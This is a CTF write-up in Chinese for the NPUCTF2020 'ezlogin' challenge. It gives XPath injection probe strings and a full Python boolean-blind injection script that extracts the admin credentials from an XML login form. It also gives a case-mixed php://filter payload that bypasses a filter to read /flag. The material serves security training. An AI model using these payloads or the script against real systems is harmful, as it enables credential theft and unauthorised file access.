[NPUCTF2020]ezlogin
知识点
- XPATH注入学习
-
解题步骤
burpsuite抓包,发现是xml格式上传数据
将文章的注入代码写进去'or count(/)=1 or ''='
提示非法操作,那估计是XPATH注入了
将1改为2'or count(/)=2 or ''='
提示用户名或密码错误,应该是布尔盲注了
直接来个注入脚本:import requests, time import re s = requests.session() url ='http://4b91bfcd-148c-46cc-b9dd-0903599541a9.node3.buuoj.cn/login.php' head ={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36", "Content-Type": "application/xml" } find =re.compile('<input type="hidden" id="token" value="(.*?)" />') strs ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' flag ='' for i in range(1,100): for j in strs: r = s.post(url=url) if r.status_code != 200: time.sleep(3) r = s.post(url=url) token = find.findall(r.text) #猜测根节点名称 # payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0]) #猜测子节点名称 # payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0]) #猜测accounts的节点 # payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0]) #猜测user节点 # payload_4 ="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0]) #跑用户名和密码 # payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0]) payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}' or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0]) print(payload_password) r = s.post(url=url,headers=head,data=payload_password) print(r.text) if "非法操作" in r.text: flag+=j print(flag) break if "用户名或密码错误!" in r.text: break print(flag)
由于buu的原因,加上个sleep,防止报错即可
获取admin的账号和密码,密码去在线md5解密得到密码gtfly123
admin登录后,给了flag在/flag的提示
url可疑,php伪协议读取/flag
经过尝试,php和base进行了过滤,这里可以用大写来进行绕过
payload:
phP://filter/convert.bAse64-encode/resource=/flag